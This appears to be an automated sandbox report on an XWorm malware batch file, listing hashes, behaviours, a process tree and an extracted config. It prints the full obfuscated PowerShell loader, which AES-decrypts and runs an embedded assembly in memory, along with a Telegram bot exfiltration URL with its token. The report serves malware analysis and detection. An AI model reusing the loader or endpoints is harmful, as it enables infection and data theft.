Analysis
-
max time kernel: 10s
max time network: 9s
platform: windows11-21h2_x64
resource: win11-20250217-en
resource tags: arch:x64 arch:x86 image:win11-20250217-en locale:en-us os:windows11-21h2-x64 system
submitted: 10/03/2025, 01:38
Static task: static1
General
-
Target: cool.bat
Size: 86KB
MD5: d7b72f5976a6337345c5dd8bfb2b0f50
SHA1: a23c01978685db66956720dba87ac61a9ef01855
SHA256: db74824e0a5ba395af91902edaa8d61106571a0cb57b71108b5d2fe012b3ad70
SHA512: 073c341ebb4b51548ebb838d6631c840963522be3162ae5ae73a70cfeb7d2d99415614bf3e60feffe2b7111668912e77a72becf4a51831fff42d961dd798bb42
SSDEEP: 1536:53jlkY2lec9Gzs6u4cKtVEUXbo/q5VSQm2yBkLKcnaNUCbYYsVyUj67oM85NisWC:53+Y2lMs6tLFboeVSpRkLJaSeyVyHEMw
Malware Config
Extracted family: xworm
-
Install_directory: %Temp%
install_file: USB.exe
pastebin_url: https://pastebin.com/raw/wXYjM7Vm
telegram: https://api.telegram.org/bot7377184900:AAHFDX1FxXhaVcxsJ6GOid3PcOAfkgsfjas/sendMessage?chat_id=6836733049
Signatures
-
Detect Xworm Payload (1 IoC)
resource: behavioral1/memory/4584-27-0x000001EDD1230000-0x000001EDD124A000-memory.dmp
yara_rule: family_xworm
-
Xworm family
-
Executes dropped EXE (1 IoC)
pid: 4584  Process: cool.bat.exe
-
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow: 1  ioc: ip-api.com
-
Modifies registry class (1 IoC)
description: Key created
ioc: \REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000_Classes\Local Settings\MuiCache
Process: MiniSearchHost.exe
-
Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid: 4584  Process: cool.bat.exe
pid: 4584  Process: cool.bat.exe
-
Suspicious use of AdjustPrivilegeToken (1 IoC)
description: Token: SeDebugPrivilege  pid: 4584  Process: cool.bat.exe
-
Suspicious use of SetWindowsHookEx (1 IoC)
pid: 3264  Process: MiniSearchHost.exe
-
Suspicious use of WriteProcessMemory (2 IoCs)
description: PID 3764 wrote to memory of 4584  pid: 3764  Process: cmd.exe  procid_target: 83
description: PID 3764 wrote to memory of 4584  pid: 3764  Process: cmd.exe  procid_target: 83
Processes
-
C:\Windows\system32\cmd.exe (tree depth 1)
Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cool.bat"
Signatures: Suspicious use of WriteProcessMemory
PID: 3764
-
C:\Users\Admin\AppData\Local\Temp\cool.bat.exe (tree depth 2, child of cmd.exe PID 3764)
Command line: "cool.bat.exe" -noprofile -executionpolicy bypass -command $jDjyk = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\cool.bat').Split([Environment]::NewLine);$EiVAn = $jDjyk[$jDjyk.Length - 1];$Rgaoo = [System.Convert]::FromBase64String($EiVAn);$CrhTj = New-Object System.Security.Cryptography.AesManaged;$CrhTj.Mode = [System.Security.Cryptography.CipherMode]::CBC;$CrhTj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$CrhTj.Key = [System.Convert]::FromBase64String('t1fjLII0udRtEfiWpM9W4Cbncb9MnHXMyBPbLRFkYG8=');$CrhTj.IV = [System.Convert]::FromBase64String('3gUtTPQsjtSLngJYOiHrPA==');$UrvZI = $CrhTj.CreateDecryptor();$Rgaoo = $UrvZI.TransformFinalBlock($Rgaoo, 0, $Rgaoo.Length);$UrvZI.Dispose();$CrhTj.Dispose();$FWvUX = New-Object System.IO.MemoryStream(, $Rgaoo);$dzSYh = New-Object System.IO.MemoryStream;$RHedL = New-Object System.IO.Compression.GZipStream($FWvUX, [IO.Compression.CompressionMode]::Decompress);$RHedL.CopyTo($dzSYh);$RHedL.Dispose();$FWvUX.Dispose();$dzSYh.Dispose();$Rgaoo = $dzSYh.ToArray();[System.Reflection.Assembly]::Load($Rgaoo).EntryPoint.Invoke($null, (, [string[]] ('')))
Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
PID: 4584
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe (tree depth 1)
Command line: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
Signatures: Modifies registry class; Suspicious use of SetWindowsHookEx
PID: 3264
Network
MITRE ATT&CK Matrix
Downloads
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize: 23KB
MD5: 5726af350fb53362b67f203382fd2eaa
SHA1: 11f6367d87b92d6c13deed8bc641422d0bcea990
SHA256: 5423fff1b9a87ffaf764d572000f10ff80994fc8662eeef2e2c55d90f03de93b
SHA512: db9afd3bb5a52e8412fd1c6481dcc707269a04655b2528ce2c05282e7f34768e133a393302263ee99c6432ee622f0953360f33b010d5cdb4149422154d36ece7
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize: 23KB
MD5: 7dc5fb5bb2228ec1072eefcf0126378b
SHA1: 59f3130b632b9807f0fe65d2c57c711409443292
SHA256: 6cfe370b81a72f38259bf85a77a8fcfa315a61807eadaf7fd7536f7571c47390
SHA512: d0c4f4536ed141552883321e4d5ac08b3cafa507ab824b529f650121e542c66d6e0033123fb2aad255f34893d5a0e700ea676f849b7ab8cb6e752a647b726174
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize: 440KB
MD5: 0e9ccd796e251916133392539572a374
SHA1: eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256: c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512: e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d